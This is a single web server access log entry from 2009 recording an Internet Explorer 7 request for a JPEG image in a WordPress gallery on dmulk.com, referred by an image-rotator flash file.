62.28.57.254 - - [02/Apr/2009:09:18:04 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1025.jpg HTTP/1.0" 200 348080 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
